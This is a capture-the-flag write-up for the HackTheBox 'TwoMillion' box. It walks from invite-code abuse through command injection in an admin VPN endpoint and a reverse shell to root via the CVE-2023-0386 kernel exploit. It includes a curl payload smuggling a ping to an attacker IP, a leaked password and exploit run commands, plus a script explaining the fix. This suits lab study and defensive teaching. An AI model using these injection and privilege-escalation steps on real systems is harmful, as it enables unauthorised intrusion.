TwoMillion
Enumeration
Ports and Services
Software Installed:
Nmap Scan Results:
Wfuzz:
The box mirrors the old HackTheBox site, where you had to hack the invite code in order to create an account.
/invite
Obfuscated JavaScript on the invite page. Ran it through de4js to make sense of it; two functions matter, and makeInviteCode() is never called from the page, so it has to be invoked by hand from the console:
function verifyInviteCode(code) {
    var formData = {
        "code": code
    };
    $.ajax({
        type: "POST",
        dataType: "json",
        data: formData,
        url: '/api/v1/invite/verify',
        success: function (response) {
            console.log(response)
        },
        error: function (response) {
            console.log(response)
        }
    })
}

function makeInviteCode() {
    $.ajax({
        type: "POST",
        dataType: "json",
        url: '/api/v1/invite/how/to/generate',
        success: function (response) {
            console.log(response)
        },
        error: function (response) {
            console.log(response)
        }
    })
}
Requesting /api/v1/invite/how/to/generate replied with an encoded string (ROT13 is an obfuscation, not encryption):
Decoded with ROT13:
In order to generate the invite code, make a POST request to
/api/v1/invite/generate
It returned a base64-encoded invite code:
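The whole invite-code dance (fetch hint, ROT13-decode, POST to the endpoint it names, base64-decode the result) scripted end to end. This is an added example, not code from the box or the writeup; the JSON field names in the sample responses are assumptions modelled on what the API returned, and the sample bodies are constructed here so the decoding runs offline.

```python
"""Automate the invite-code flow described above (added example)."""
import base64
import codecs
import json
import re
import urllib.request

# Constructed sample responses, not captured output: a JSON body whose "data"
# object carries the interesting string. Field names are assumptions.
SAMPLE_HOWTO = json.dumps({
    "0": 200,
    "success": 1,
    "data": {
        "data": "Va beqre gb trarengr gur vaivgr pbqr, znxr n CBFG erdhrfg gb /ncv/i1/vaivgr/trarengr",
        "enctype": "ROT13",
    },
})
SAMPLE_GENERATE = json.dumps({
    "0": 200,
    "success": 1,
    "data": {
        # A made-up invite code, base64-wrapped the way the real endpoint does it.
        "code": base64.b64encode(b"ABCDE-FGHIJ-KLMNO-PQRST").decode(),
        "format": "encoded",
    },
})


def rot13(text: str) -> str:
    """ROT13 is a Caesar shift by 13, so encoding and decoding are the same op."""
    return codecs.decode(text, "rot13")


def hint_to_path(howto_body: str) -> str:
    """Decode the ROT13 hint and pull out the endpoint it tells us to POST to."""
    payload = json.loads(howto_body)["data"]
    if str(payload.get("enctype", "")).upper() != "ROT13":
        raise ValueError(f"unexpected enctype: {payload.get('enctype')!r}")
    plain = rot13(payload["data"])
    match = re.search(r"/api/v1/\S+", plain)
    if not match:
        raise ValueError(f"no endpoint found in hint: {plain!r}")
    return match.group(0).rstrip(".,")


def code_from_generate(generate_body: str) -> str:
    """The generate endpoint wraps the invite code in base64; unwrap it."""
    payload = json.loads(generate_body)["data"]
    return base64.b64decode(payload["code"]).decode()


def post_json(url: str, body=None) -> str:
    """Minimal POST helper; the API only needs the method and a JSON Accept header."""
    data = json.dumps(body or {}).encode()
    req = urllib.request.Request(
        url, data=data, method="POST",
        headers={"Content-Type": "application/json", "Accept": "application/json"},
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode()


def fetch_invite_code(base_url: str = "http://2million.htb") -> str:
    """Live version of the flow: hint -> ROT13 -> generate -> base64-decode."""
    path = hint_to_path(post_json(f"{base_url}/api/v1/invite/how/to/generate"))
    return code_from_generate(post_json(f"{base_url}{path}"))


if __name__ == "__main__":
    # Offline demo against the constructed samples.
    print(hint_to_path(SAMPLE_HOWTO))
    print(code_from_generate(SAMPLE_GENERATE))
```

The endpoint path is taken from the decoded hint rather than hard-coded, so the script still works if the API moves the generator; the enctype check is there because the hint field tells you how it was encoded, and a silent ROT13 of something else would just produce garbage.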
Registered and logged in
List of endpoints:
Made myself an admin:
The username field of the admin VPN generator is passed to a shell, so a command can be injected there.
Confirmed blind execution with a ping back to my box (listening with tcpdump for ICMP):
curl -X POST http://2million.htb/api/v1/admin/vpn/generate --cookie "PHPSESSID=5putl0e0thh2nevv06ifv0ipbr" --header "Content-Type: application/json" --data '{"username":"test;ping -c 1 10.10.14.10;"}'
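Why the payload above works, and what the fix looks like. The writeup does not show the server-side code, so this added example uses a hypothetical stand-in binary (/opt/vpn/generate) for whatever the backend really runs; the point is how /bin/sh tokenises `test;ping -c 1 10.10.14.10;` into two commands, and that the hardened form validates the field against an allow-list and passes it as a single argv element instead of through a shell. None of this is code from the box.

```python
"""Vulnerable-vs-hardened view of the VPN generate endpoint (added example)."""
import re
import shlex

# The injection string from the curl above (constructed here, not a capture).
PAYLOAD = "test;ping -c 1 10.10.14.10;"

# Hypothetical stand-in for whatever binary the real backend invokes.
VPN_TOOL = "/opt/vpn/generate"

# Allow-list: what a username is permitted to look like.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,64}$")


def vulnerable_cmdline(username: str) -> str:
    """The bug: an attacker-controlled value interpolated into a shell string
    (think PHP exec("... $username") or Python os.system)."""
    return f"{VPN_TOOL} {username}"


def shell_commands(cmdline: str) -> list:
    """Split a command line the way /bin/sh would, at ; && || | & separators,
    to show how many separate commands the shell actually runs."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    commands, current = [], []
    for token in lexer:
        if token in (";", "&&", "||", "|", "&"):
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


def is_safe_username(username: str) -> bool:
    """Allow-list the field; blacklisting shell metacharacters always misses some."""
    return USERNAME_RE.fullmatch(username) is not None


def hardened_argv(username: str) -> list:
    """Fixed form: validate, then hand the value over as its own argv element so
    no shell ever parses it. Run it with subprocess.run(argv) and no shell=True."""
    if not is_safe_username(username):
        raise ValueError("invalid username")
    return [VPN_TOOL, "--", username]


if __name__ == "__main__":
    for cmd in shell_commands(vulnerable_cmdline(PAYLOAD)):
        print("shell would run:", cmd)
    print("allow-list accepts payload?", is_safe_username(PAYLOAD))
    print("hardened argv:", hardened_argv("test"))
```

The `--` in the hardened argv stops a username starting with `-` from being read as an option by the tool; the regex already forbids a leading dash here, but defence in depth costs nothing. Quoting the value inside a shell string (shlex.quote) also works, but the argv form removes the shell from the picture entirely.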
Initial Foothold
Got a reverse shell as www-data. Found a password in /var/www/html/.env:
Users with a login shell:
The admin account reuses that password. SSH as admin with SuperDuperPass123:
User.txt Proof Screenshot
Privilege Escalation
The admin user has mail:
The exploit used is for CVE-2023-0386 (OverlayFS/FUSE), https://nvd.nist.gov/vuln/detail/CVE-2023-0386
Copied the exploit from
https://github.com/xkaneiki/CVE-2023-0386
Ran make all, then ./fuse ./ovlcap/lower ./gc & (in the background, it mounts the FUSE filesystem the exploit needs), then ./exp for the root shell.
Worth checking uname -r first: the fix landed in kernel 6.2 and was backported to stable branches, so this only works on hosts that have not been patched.
RootScreenshot Here: